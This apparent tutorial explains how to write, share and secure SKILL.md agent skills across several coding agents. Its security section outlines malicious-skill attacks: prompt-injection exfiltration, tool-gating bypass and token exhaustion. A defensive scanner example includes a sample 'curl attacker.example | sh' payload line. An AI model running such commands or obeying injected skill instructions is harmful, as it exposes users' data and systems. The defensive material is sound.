How to Use AI Agent Skills in 2026: The Complete Guide

AI agent skills are changing how developers work with coding assistants. Instead of repeating the same instructions every session, you write them once in a SKILL.md file and your agent knows exactly what to do. This guide covers everything: what skills are, how they work across Claude Code, Codex, OpenClaw, and the claude.ai web interface, how to write your own, and how to stay safe doing it.


What Are AI Agent Skills?

If you've ever found yourself pasting the same long instructions into ChatGPT, Claude, or Codex at the start of every session—explaining your project's conventions, how to run tests, or how deployments work—skills solve that problem permanently.

An AI agent skill is a reusable instruction bundle that teaches an AI coding assistant a specific procedure. Think of it as a recipe card for your agent: it describes when to activate, what to do, and how to do it. The skill lives in a folder in your project or on your system, and the agent loads it automatically when it's relevant.

At its core, a skill is a folder whose centerpiece is a SKILL.md file. That file contains two parts:

  • YAML frontmatter with metadata (name, description) used for discovery and routing
  • A Markdown body with step-by-step instructions the agent follows when the skill activates

The folder can also include scripts/, references/, and assets/ directories with supporting files the agent can read or execute on demand.

Want to skip writing from scratch? Browse our AI Agent Skills Database — a curated library of 2,636+ ready-to-use SKILL.md files for Claude Code, Codex, OpenAI, and more. Download, customize, and drop them straight into your project.
Skills vs. system prompts vs. tools: System prompts set global constraints. Tools perform side effects (file I/O, API calls). Skills package repeatable procedures plus scripts and assets so they can be versioned, shared, and reused independently—like functions for your AI assistant.

How Skills Work: Progressive Disclosure

Skills don't dump their entire contents into the AI's context window from the start. That would waste tokens and slow things down. Instead, every major platform uses a three-tier progressive disclosure model:

The Skill Lifecycle

Catalog (name + description only) → Activate (full SKILL.md body loads) → Execute (scripts & refs on demand)

  1. Catalog disclosure: At session start, the agent sees only each skill's name and description—a compact list that costs minimal tokens. This is enough for the agent to know what's available.
  2. Activation: When the agent determines a skill is relevant (either because you triggered it or because the task matches the description), it loads the full SKILL.md body into context.
  3. Resource loading: Scripts, reference documents, and assets are loaded on-demand only when the instructions reference them—not preemptively.

This design keeps context lean. A project with 20 installed skills might only pay the token cost for 1–2 of them in any given session.
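The three-tier model can be sketched in a few lines of Python. This is a toy illustration, not any platform's actual loader; the skill names and bodies are invented:

```python
from dataclasses import dataclass

@dataclass
class Skill:
    name: str
    description: str
    body: str  # full SKILL.md instructions

def catalog_entry(skill: Skill) -> str:
    # Tier 1: only name + description are visible at session start.
    return f"{skill.name}: {skill.description}"

def activate(skill: Skill) -> str:
    # Tier 2: the full body enters context only once the skill is selected.
    return skill.body

skills = [
    Skill("deploy-staging", "Deploy the current branch to staging.", "## Steps\n1. ..."),
    Skill("run-tests", "Run the project test suite.", "## Steps\n1. ..."),
]

catalog = [catalog_entry(s) for s in skills]  # cheap: every session pays this
active = activate(skills[1])                  # costly: paid only on a match
```

Tier 3 (scripts and references) follows the same pattern: files load only when the activated body mentions them.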

The SKILL.md File Format

The SKILL.md file is the manifest that makes everything work. Here's the anatomy of one:

```markdown
---
name: deploy-staging
description: Deploy the current branch to the staging environment. Use when the user asks to "deploy to staging", "push to stage", or "test in staging".
license: MIT
compatibility: Requires docker and kubectl. Network access required.
---

# Deploy to Staging

## When to use this skill
Use when the user wants to deploy their current branch to staging.
Trigger phrases: "deploy to staging", "push to stage", "ship it to test"

## Steps
1. Verify the working tree is clean (no uncommitted changes).
2. Run the test suite: `npm test`
3. Build the Docker image: `docker build -t app:staging .`
4. Push and deploy: `kubectl apply -f k8s/staging/`
5. Verify the deployment is healthy.

## Safety
- Never deploy with failing tests.
- Always confirm with the user before the kubectl apply step.
```

Required Frontmatter Fields

  • name (required): 1–64 characters, kebab-case (a-z, numbers, hyphens). Must match the parent directory name. No consecutive hyphens.
  • description (required): 1–1024 characters. Explains what the skill does and when to use it. This is the routing signal—make it keyword-rich.

Optional Frontmatter Fields

  • license: License identifier (e.g., MIT, Apache-2.0).
  • compatibility: Runtime requirements (binaries, network, OS).
  • metadata: Additional key-value pairs for platform-specific properties.
  • allowed-tools (experimental): Space-delimited allowlist of tools the skill may use.
Pro tip: The description field is the single most important thing you write. It drives both implicit activation (the agent auto-selects) and search/discovery. Include the actual phrases your team uses—"deploy to staging", "push to prod", "run the migration"—not just technical descriptions.

Skills Across Platforms: A Comparison

The SKILL.md format has been adopted across multiple AI coding platforms, but each implements it differently. Here's how they compare:

Claude Code

Anthropic's CLI agent. Skills live in your project's .claude/skills/ directory or the user-level ~/.claude/skills/. Skills can be invoked as slash commands (e.g., /deploy) or triggered automatically when the agent recognizes a matching task from the description.

.claude/skills/<skill-name>/SKILL.md

OpenAI Codex

OpenAI's coding agent. Scans .agents/skills/ up the directory tree to the repo root, plus user-level ~/.agents/skills and admin /etc/codex/skills. Supports an optional agents/openai.yaml sidecar for UI metadata and MCP tool dependencies.

.agents/skills/<skill-name>/SKILL.md

OpenClaw

Open-source agent with a skill registry (ClawHub). Loads from bundled, managed (~/.openclaw/skills), and workspace sources with configurable precedence. Supports load-time gating (OS, binaries, env vars) and per-run environment injection.

~/.openclaw/skills/<skill-name>/SKILL.md

Claude Web (claude.ai)

Claude.ai has built-in Agent Skills (PowerPoint, Excel, Word, PDF) that activate automatically. Pro/Max/Team/Enterprise users can also upload custom skills as zip files via Settings. Separate from skills, Projects provide persistent instructions and knowledge files across conversations.

Settings → Features → Custom Skills

Claude Code Skills

Claude Code is Anthropic's terminal-based AI coding agent and has the most feature-rich skill implementation of any platform. Skills follow the Agent Skills standard with several powerful Claude-specific extensions.

Skill Scopes

| Scope | Path | Who It Applies To |
|---|---|---|
| Enterprise | Managed settings | All organization users |
| Personal | ~/.claude/skills/<name>/SKILL.md | You, across all projects |
| Project | .claude/skills/<name>/SKILL.md | Anyone working in this repo |
| Plugin | <plugin>/skills/<name>/SKILL.md | Where the plugin is enabled |

Extended Frontmatter (Claude Code-specific)

Claude Code supports several frontmatter fields beyond the base Agent Skills spec:

```markdown
---
name: my-skill
description: What this skill does and when to use it
argument-hint: "[issue-number]"   # Shown in autocomplete
disable-model-invocation: true    # Only user can trigger (no auto-trigger)
user-invocable: false             # Only Claude can trigger (hidden from / menu)
allowed-tools: Read, Grep, Glob   # Pre-approved tools (no permission prompts)
model: claude-opus-4-6            # Override model for this skill
context: fork                     # Run in an isolated subagent
agent: Explore                    # Subagent type: Explore, Plan, general-purpose
---
```

Claude Code also supports dynamic context injection with !command syntax (shell commands that run before the skill loads) and argument substitution with $ARGUMENTS, $1, $2, etc.
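A minimal sketch of how positional and $ARGUMENTS substitution might behave. This is an assumption-based illustration, not Claude Code's actual implementation, which may differ on quoting and missing arguments:

```python
def substitute_arguments(body: str, args: list[str]) -> str:
    """Fill $1, $2, ... and $ARGUMENTS placeholders in a skill body."""
    # Replace positional parameters highest-index first so $12 wins over $1.
    for i in range(len(args), 0, -1):
        body = body.replace(f"${i}", args[i - 1])
    # $ARGUMENTS expands to the full, space-joined argument string.
    return body.replace("$ARGUMENTS", " ".join(args))

filled = substitute_arguments("Fix issue #$1 and note: $ARGUMENTS", ["123", "urgent"])
# filled == "Fix issue #123 and note: 123 urgent"
```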

Built-in Skills

Claude Code ships with several skills out of the box:

  • /batch <instruction> — parallel codebase changes across git worktrees
  • /claude-api — loads Claude API reference for your language
  • /debug [description] — troubleshoot sessions
  • /loop [interval] <prompt> — repeat a prompt on a schedule
  • /simplify [focus] — parallel code review and cleanup
Legacy compatibility: If you have old .claude/commands/ files, they still work. Skills and commands share the same frontmatter format, but skills take precedence if both exist with the same name.

OpenAI Codex Skills

Codex uses the .agents/skills/ directory convention and supports both implicit and explicit skill invocation:

  • Implicit invocation: Codex reads the description and automatically activates the skill when it detects a matching task—no slash command needed
  • Explicit invocation: Users type $skill-name to force-activate a specific skill
  • Directory scanning: Codex walks up the directory tree from your current working directory to the repo root, scanning every .agents/skills/ it finds. This means a monorepo can have global skills at the root and sub-project skills in nested directories
  • Sidecar metadata: An optional agents/openai.yaml file can declare UI display names, invocation policies, and MCP tool dependencies
```yaml
interface:
  display_name: "Release Manager"
  short_description: "Cut safe releases with validation gates."
policy:
  allow_implicit_invocation: true
dependencies:
  tools:
    - type: "mcp"
      value: "myOrgCI"
      description: "CI and release tooling"
```
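The upward directory scan Codex performs can be sketched as follows. This is a simplified illustration of the behavior described above; the real scanner may differ in ordering and edge cases:

```python
import tempfile
from pathlib import Path

def find_skill_dirs(cwd: Path, repo_root: Path) -> list[Path]:
    """Walk from cwd up to repo_root, collecting every .agents/skills/ dir.

    Nearest directories come first, so sub-project skills can shadow
    repo-level ones in a monorepo.
    """
    found = []
    current = cwd.resolve()
    root = repo_root.resolve()
    while True:
        candidate = current / ".agents" / "skills"
        if candidate.is_dir():
            found.append(candidate)
        if current == root or current.parent == current:
            break
        current = current.parent
    return found

# Demo on a throwaway layout: the repo root and a nested sub-project
# each carry their own .agents/skills/ directory.
with tempfile.TemporaryDirectory() as tmp:
    root = Path(tmp).resolve()
    (root / ".agents" / "skills").mkdir(parents=True)
    sub = root / "packages" / "api"
    (sub / ".agents" / "skills").mkdir(parents=True)
    nearest_first = [p.relative_to(root).as_posix()
                     for p in find_skill_dirs(sub, root)]
# nearest_first == ["packages/api/.agents/skills", ".agents/skills"]
```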

OpenClaw Skills

OpenClaw is an open-source AI agent that adds several unique capabilities on top of the baseline Agent Skills spec:

  • Load-time gating: Skills can declare prerequisites via metadata.openclaw—required binaries, environment variables, OS, or config values. Skills that don't pass the gate aren't even shown to the model
  • ClawHub registry: A public skill registry where you can browse, install, and publish skills. Think npm for AI agent skills
  • Three-source precedence: Bundled skills (shipped with OpenClaw) → managed skills (~/.openclaw/skills) → workspace skills. Workspace skills override managed, which override bundled
  • Slash commands: Skills can be marked user-invocable: true and given a custom slash command name
  • Environment injection: OpenClaw can inject API keys and environment variables for the duration of a skill's execution, then restore the original environment afterward
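The load-time gating idea reduces to a simple predicate. The requirements shape below is invented for illustration and is not the real metadata.openclaw schema:

```python
import os
import platform
import shutil

def passes_gate(requirements: dict) -> bool:
    """Decide whether a skill's prerequisites are met before it is listed."""
    for binary in requirements.get("binaries", []):
        if shutil.which(binary) is None:      # required CLI tool missing
            return False
    for var in requirements.get("env", []):
        if var not in os.environ:             # required env var unset
            return False
    allowed = requirements.get("os")
    if allowed and platform.system().lower() not in allowed:
        return False                          # wrong operating system
    return True

# Skills that fail the gate are simply never shown to the model.
visible = passes_gate({})  # no prerequisites: always listed
```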
ClawHub safety note: There have been reported incidents of malicious skills distributed through open registries like ClawHub. Always review skill contents before installing, especially any bundled scripts. Treat skills from unknown authors like untrusted npm packages.

Claude Web Interface (claude.ai)

Claude's web interface actually has two separate skill-like systems: built-in Agent Skills and Projects.

Built-in Agent Skills

Claude.ai comes with pre-built skills that activate automatically when you create documents:

  • PowerPoint (pptx) — create and edit presentations
  • Excel (xlsx) — create spreadsheets, data analysis, charts
  • Word (docx) — create and edit documents
  • PDF (pdf) — generate formatted PDFs

These work behind the scenes—no setup required. When you ask Claude to "make a slide deck" or "create a spreadsheet," the relevant skill activates automatically.

Custom Skills on claude.ai

On Pro, Max, Team, and Enterprise plans with code execution enabled, you can upload custom skills as zip files through Settings > Features. These skills run in a VM environment where Claude has filesystem access. Note that custom skills are individual to each user and do not sync across surfaces (claude.ai, API, and Claude Code are separate).

Projects (Separate Feature)

Projects on claude.ai provide conversation-level context—custom instructions and knowledge files that persist across chats within a project. This is a different feature from Skills, but serves a complementary purpose:

  • Create a Project: From the Claude sidebar, create a new Project and give it a name
  • Add Custom Instructions: Write instructions that persist across every conversation in the project
  • Upload Reference Files: Attach documents, code samples, or data files that Claude can reference

Think of it this way: Projects provide context (who you are, what you're working on), while Skills provide capabilities (procedures the agent can execute).

Quick Comparison Table

| Feature | Claude Code | Codex | OpenClaw | Claude Web |
|---|---|---|---|---|
| Skill format | SKILL.md | SKILL.md | SKILL.md | Zip upload / built-in |
| Skill directory | .claude/skills/ | .agents/skills/ | ~/.openclaw/skills/ | Settings > Features |
| Auto-trigger | Yes (via description) | Yes (implicit invocation) | Yes (with gating) | Yes (built-in skills) |
| Slash commands | Yes (/skill-name) | Yes ($skill-name) | Yes (configurable) | No |
| Script bundling | Yes | Yes | Yes | Yes (runs in VM) |
| Public registry | Community sharing | Built-in installers | ClawHub | No |
| Platform sidecar | Extended frontmatter | agents/openai.yaml | metadata.openclaw | No |

How to Create Your First Skill

Let's walk through creating a skill from scratch. This example works on any Agent Skills-compatible platform—just adjust the directory path.

Step 1: Create the Skill Directory

Make a folder for your skill. The folder name should match the skill's name field.

```shell
# For Claude Code:
mkdir -p .claude/skills/run-tests

# For Codex:
mkdir -p .agents/skills/run-tests

# For OpenClaw:
mkdir -p ~/.openclaw/skills/run-tests
```
Step 2: Write the SKILL.md File

Create SKILL.md inside your skill folder with frontmatter and instructions:

```markdown
---
name: run-tests
description: Run the project test suite and report results. Use when the user says "run tests", "check tests", or "are the tests passing".
---

# Run Tests

## When to use this skill
Use when the user asks to run, check, or verify tests.
Do NOT use when the user only asks about test coverage or wants to write new tests.

## Steps
1. Check which test runner is configured (look for jest.config, vitest.config, pytest.ini, etc.)
2. Run the appropriate test command.
3. If tests fail, summarize which tests failed and why.
4. If all tests pass, confirm with a brief summary.

## Safety
- Never modify test files unless explicitly asked.
- If the test suite takes longer than 5 minutes, warn the user before running.
```
Step 3: Add Supporting Files (Optional)

If your skill needs scripts or reference docs, add them to subdirectories:

```
run-tests/
  SKILL.md                  # Main manifest
  scripts/
    run_tests.sh            # Helper script
  references/
    test-conventions.md     # Project test patterns
```
Step 4: Test It

Start a new session with your agent and try triggering the skill:

  • Implicit: Just say "run the tests" and see if the agent activates your skill
  • Explicit: Use the platform's invocation syntax (/run-tests in Claude Code, $run-tests in Codex)

If the skill doesn't trigger, refine the description field—it's almost always a routing problem.

Real-World Skill Example: CSV Analyzer

Here's a more substantial skill that bundles a Python script and a reference template. This demonstrates how skills handle multi-step workflows with validation gates:

```markdown
---
name: csv-insights
description: Summarize CSV files into a markdown report with chart images. Use when the user mentions CSV analysis, cleaning, or summary reporting.
compatibility: Requires python3 and a writable working directory.
metadata:
  author: "data-platform"
  version: "1.2.0"
---

# CSV Insights

## When to use this skill
Use when the user asks for: "summarize this CSV", "clean up this dataset",
"make a chart from my spreadsheet", "top N rows by metric".
Do NOT use when the user only wants a quick explanation without processing files.

## Inputs
- A CSV path (local to the execution environment)
- Optional: column names to prioritize

## Outputs
- outputs/report.md
- Optional: outputs/charts/*.png

## Workflow
1. Validate input file exists and is a CSV.
   - If not, stop and ask for the correct path.
2. Run the analyzer script:
   python3 scripts/analyze_csv.py --input "<CSV_PATH>" --out "outputs/report.md"
3. Validate the report contains:
   - Dataset shape
   - Missingness summary
   - Top 5 rows preview
4. If charts were requested, ensure at least one image exists.
5. If validation fails, fix and re-run once.

## Gotchas
- If a CSV uses semicolons as delimiter, detect and pass --delimiter.
- If the file exceeds 100MB, sample rows and say you sampled.

## References
- See references/report-template.md for the report layout template.
```

This skill follows the "plan-validate-execute" pattern recommended by the Agent Skills specification. The agent won't blindly run the script—it validates inputs first, checks outputs after, and has a clear error-handling path.
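For illustration, here is one way the bundled scripts/analyze_csv.py could be implemented. This is a sketch under the assumptions above (report shape, flag names), not the skill author's actual script:

```python
import csv
import tempfile
from pathlib import Path

def analyze_csv(input_path: str, out_path: str, delimiter: str = ",") -> str:
    """Summarize a CSV into a small markdown report and write it to out_path."""
    with open(input_path, newline="") as f:
        rows = list(csv.reader(f, delimiter=delimiter))
    header, data = rows[0], rows[1:]
    missing = sum(1 for row in data for cell in row if cell.strip() == "")
    lines = [
        "# CSV Report",
        f"- Shape: {len(data)} rows x {len(header)} columns",
        f"- Missing cells: {missing}",
        "",
        "## Top 5 rows",
    ]
    lines += [" | ".join(row) for row in data[:5]]
    report = "\n".join(lines)
    out = Path(out_path)
    out.parent.mkdir(parents=True, exist_ok=True)  # ensure outputs/ exists
    out.write_text(report)
    return report

# Demo on a throwaway file with one missing cell.
with tempfile.TemporaryDirectory() as tmp:
    src = Path(tmp) / "data.csv"
    src.write_text("a,b\n1,\n2,3\n")
    report = analyze_csv(str(src), str(Path(tmp) / "outputs" / "report.md"))
```

Note how the script is non-interactive and writes its report to a predictable path, so the agent's validation step (dataset shape, missingness, preview) can check the output mechanically.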

Installing and Sharing Skills

Skills are just folders with files, so sharing them is straightforward:

Sharing via Git

The simplest approach: commit your .claude/skills/ or .agents/skills/ directory to your repository. Every team member who clones the repo gets the skills automatically. This is the recommended approach for project-specific skills.

User-Level Skills

For personal skills you want across all projects, place them in the user-level directory:

  • Claude Code: ~/.claude/skills/
  • Codex: ~/.agents/skills/
  • OpenClaw: ~/.openclaw/skills/

Registry Installation (OpenClaw)

OpenClaw's ClawHub provides a public registry where you can browse and install community skills. It works similarly to npm: search, review, install, and pin versions. Codex also has built-in installer commands for skills.

Pre-Built Skill Libraries

If you don't want to write skills from scratch, our AI Agent Skills Database has 2,636+ curated SKILL.md files ready to download for Claude Code, Codex, OpenAI, and other platforms. Just download, drop into your skills directory, and you're good to go.

Zip Bundles (OpenAI Skills Tool)

The OpenAI Skills tool (via the Responses API) accepts skills as zip uploads with specific constraints: exactly one SKILL.md per bundle, validated frontmatter, and hard limits on zip size and file count.

Portability tip: If you want a skill to work on both Claude Code and Codex, you can symlink the same skill folder into both .claude/skills/ and .agents/skills/. The SKILL.md format is identical.

The Agent Skills Open Specification

The Agent Skills specification (agentskills.io), originally developed by Anthropic, has become the dominant cross-platform standard. As of early 2026, over 30 agent products have adopted it—including competitors like OpenAI Codex, Google Gemini CLI, Microsoft/GitHub Copilot, Cursor, JetBrains Junie, and many more.

The spec defines:

  • Required frontmatter: name and description with specific validation rules
  • Optional frontmatter: license, compatibility, metadata, allowed-tools
  • Folder conventions: scripts/, references/, assets/
  • Naming rules: kebab-case, 1–64 characters, no consecutive hyphens, no leading/trailing hyphens
  • Validation tooling: A reference library (skills-ref) for validating skill directories and generating prompt blocks
  • Cross-client path: The .agents/skills/ convention as an interoperability directory that all clients can scan

If you write skills that adhere to the Agent Skills spec, they'll work across platforms with minimal or no changes. The .agents/skills/ directory convention means a skill written for Claude Code can work in Codex, Gemini CLI, Cursor, and others without modification.
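The naming and length rules are easy to check mechanically. Here is a sketch of a validator that only encodes the constraints quoted in this article; the reference skills-ref library is the authority on edge cases:

```python
import re

NAME_RE = re.compile(r"^[a-z0-9]+(-[a-z0-9]+)*$")  # kebab-case, no stray hyphens

def validate_frontmatter(name: str, description: str) -> list[str]:
    """Return a list of violations of the required-field rules."""
    errors = []
    if not 1 <= len(name) <= 64:
        errors.append("name must be 1-64 characters")
    if not NAME_RE.fullmatch(name):
        errors.append("name must be kebab-case with no leading/trailing or consecutive hyphens")
    if not 1 <= len(description) <= 1024:
        errors.append("description must be 1-1024 characters")
    return errors
```

The regex rejects uppercase, leading or trailing hyphens, and consecutive hyphens in one pattern, which covers the spec's naming rules listed above.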

Supported platforms include: Claude Code, Claude.ai, OpenAI Codex, VS Code/Copilot, GitHub Copilot, Cursor, Gemini CLI, JetBrains Junie, Roo Code, Goose, OpenHands, Amp, Letta, Firebender, Databricks, Snowflake, Spring AI, Laravel Boost, Mistral Vibe, TRAE (ByteDance), Qodo, and more.

The spec also provides an implementor guide with guidance on:

  • How to discover skills (scan project + user scopes)
  • How to parse frontmatter (handle malformed YAML gracefully)
  • How to manage context (prevent skill instructions from being pruned during long sessions)
  • How to handle trust (gate project-level skills in untrusted repositories)
```
.agents/skills/                 # Interoperability convention
  deploy-staging/
    SKILL.md                    # Manifest + instructions
    scripts/
      validate_deploy.sh        # Non-interactive, has --help
    references/
      runbook.md                # Linked from SKILL.md body
    assets/
      config-template.yaml      # Templates, samples
```

Security and Safety: Treating Skills Like Code

This is the section most people skip. Don't.

Skills are privileged instructions with real security implications. When an agent loads a skill, it follows those instructions with the same trust it gives system prompts. A malicious skill can:

  • Exfiltrate data through prompt injection (asking the agent to send file contents to external services)
  • Execute arbitrary code via bundled scripts
  • Exhaust tokens and inflate costs (documented in academic research as "Clawdrain" attacks)
  • Bypass tool restrictions by instructing the agent to use terminal commands instead of gated tools
Real incidents have occurred. Malware has been distributed through open skill registries. A 1Password analysis showed that malicious skills can bypass tool-gating assumptions by social-engineering agents into running terminal commands. Academic research has demonstrated Trojanized skills that cause multi-turn token exhaustion.

Your Security Checklist

  1. Review before installing: Read the SKILL.md and every bundled script before adding a skill from an external source. Treat it like reviewing a pull request.
  2. Pin versions: If using a registry, pin to specific versions rather than tracking latest.
  3. Trust boundaries: Don't auto-load project-level skills from freshly cloned repositories without reviewing them first. Some platforms gate this automatically.
  4. Minimize privileges: Use allowed-tools where supported to restrict what the agent can do during skill execution.
  5. Approval gates: Design skills with explicit confirmation steps before destructive actions (deleting files, deploying, sending messages).
  6. Keep scripts minimal: Bundled scripts should be short, readable, non-interactive, and have no network calls unless absolutely necessary.
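To support the review step, a crude keyword scan can surface lines worth a closer look. The pattern list is illustrative; this is a review aid, not a scanner that proves a skill safe:

```python
RISKY_PATTERNS = ("curl ", "wget ", "base64 -d", "eval ", "chmod +x", "| sh")

def flag_suspicious_lines(script_text: str) -> list[tuple[int, str]]:
    """List (line number, line) pairs in a bundled script that merit review."""
    hits = []
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        if any(pattern in line for pattern in RISKY_PATTERNS):
            hits.append((lineno, line.strip()))
    return hits

script = "echo building\ncurl http://attacker.example/payload | sh\n"
review = flag_suspicious_lines(script)
# review == [(2, "curl http://attacker.example/payload | sh")]
```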

Best Practices for Writing Effective Skills

After studying how skills work across platforms and reading the Agent Skills authoring guidance, here are the patterns that consistently produce the best results:

Write for Your Agent, Not for Humans

Skills are instructions for an AI, not documentation for developers. Be imperative: "Run npm test" rather than "The test suite can be executed via npm." Include explicit defaults: "If the user doesn't specify a branch, use main." Don't offer menus of options—make the decision and let the user override.

Include Negative Triggers

Always define when the skill should not activate. Without this, you'll get false triggers that frustrate users. A good "When to use" section has both positive and negative examples:

```markdown
## When to use this skill
Use when the user asks to: "run tests", "check if tests pass", "verify the test suite".

Do NOT use when the user:
- Asks to write or create new tests
- Asks about test coverage percentages
- Mentions "testing" in a non-code context
```

Keep the Body Under 5,000 Tokens

The entire SKILL.md body loads into context on activation. If it's too long, it wastes context window space and may cause the agent to miss important parts. Move detailed reference material into references/ files and link to them from the body.
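A quick budget check using the common ~4 characters/token heuristic can catch oversized bodies early. Real tokenizers vary by model, so treat this only as a sanity check:

```python
def estimate_tokens(text: str) -> int:
    # Rough heuristic: ~4 characters per token for English/Markdown text.
    return max(1, len(text) // 4)

def within_skill_budget(body: str, limit: int = 5000) -> bool:
    """True if the SKILL.md body is plausibly under the token budget."""
    return estimate_tokens(body) <= limit
```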

Design Scripts for Agents

If your skill bundles scripts, design them for non-interactive use:

  • Accept all inputs as command-line arguments (no interactive prompts)
  • Include a --help flag with clear usage information
  • Output structured data (JSON) where possible
  • Return meaningful exit codes and error messages
  • Default to safe behavior (dry-run mode for destructive operations)
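Those guidelines translate into a small script skeleton. The branch-pruning scenario and flag names here are invented for illustration:

```python
import argparse
import json

def build_parser() -> argparse.ArgumentParser:
    # argparse gives us --help for free; every input is a flag, never a prompt.
    parser = argparse.ArgumentParser(
        description="Prune stale branches. Dry-run by default; pass --apply to act."
    )
    parser.add_argument("--older-than-days", type=int, default=30)
    parser.add_argument("--apply", action="store_true",
                        help="Actually delete; omit for a safe dry run.")
    return parser

def run(argv: list[str]) -> dict:
    args = build_parser().parse_args(argv)
    return {
        "dry_run": not args.apply,   # safe default: report, don't delete
        "older_than_days": args.older_than_days,
        "deleted": [],               # a real script would act here under --apply
    }

result = run(["--older-than-days", "7"])
print(json.dumps(result))  # structured output the agent can parse
```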

Test With Eval Prompts

The Agent Skills spec recommends building a set of test prompts: at least 5–10 that should trigger the skill and 3–5 that should not. Run "with skill" vs. "without skill" baselines to measure whether the skill actually helps. Track token usage if your platform exposes it.
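A toy harness for the with/without-trigger evaluation. The keyword matcher below merely stands in for a platform's real description-based routing:

```python
def evaluate_routing(matcher, should_trigger, should_not):
    """Score a trigger predicate against positive and negative prompts."""
    true_pos = sum(1 for p in should_trigger if matcher(p))
    false_pos = sum(1 for p in should_not if matcher(p))
    return {
        "trigger_rate": true_pos / len(should_trigger),
        "false_trigger_rate": false_pos / len(should_not),
    }

# Toy matcher: fire on phrases lifted from the skill's description.
keywords = ("run tests", "tests pass", "test suite")
matcher = lambda prompt: any(k in prompt.lower() for k in keywords)

scores = evaluate_routing(
    matcher,
    should_trigger=["run tests please", "do the tests pass?", "check the test suite"],
    should_not=["write a new test for login", "what is our coverage?"],
)
```

A skill is well-routed when the trigger rate is high and the false-trigger rate is near zero; if not, the fix is almost always rewording the description.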

Version and Iterate

Skills aren't write-once. As your project evolves, update the skill. When your deployment process changes, update the deploy skill. When your team adopts a new testing framework, update the test skill. Treat skill maintenance like code maintenance.

Key Takeaways

  • Skills are reusable instruction bundles that teach AI agents specific procedures. They live in SKILL.md files with YAML frontmatter (name + description) and a Markdown body with step-by-step instructions.
  • Progressive disclosure keeps things efficient: agents see only skill names and descriptions at startup, loading full instructions only when a skill is relevant.
  • The format works across platforms: Claude Code, Codex, OpenClaw, and the OpenAI Skills tool all use compatible SKILL.md files. The Agent Skills specification provides the cross-platform standard.
  • The description field is everything: it drives both automatic activation and discovery. Write it like a search query with real trigger phrases your team uses.
  • Treat skills like code dependencies: review before installing, pin versions, gate trust, and design with safety constraints. Real supply-chain attacks have already happened.
  • Start simple: your first skill can be 10 lines of Markdown. You don't need scripts, assets, or complex workflows to get value from skills. A "run tests" or "deploy to staging" skill with 5 clear steps will save your team hours. Or browse 2,636+ ready-made skills in our AI Agent Skills Database.
  • Even web users benefit: Claude's Projects feature provides the same core value—persistent instructions across conversations—without requiring the CLI or SKILL.md files.

The shift happening in 2026 is clear: we're moving from one-shot prompting to persistent, composable agent behaviors. Skills are how you get there. Whether you're using Claude Code, Codex, or OpenClaw, the investment in writing good skills pays for itself in the first week—and compounds from there.

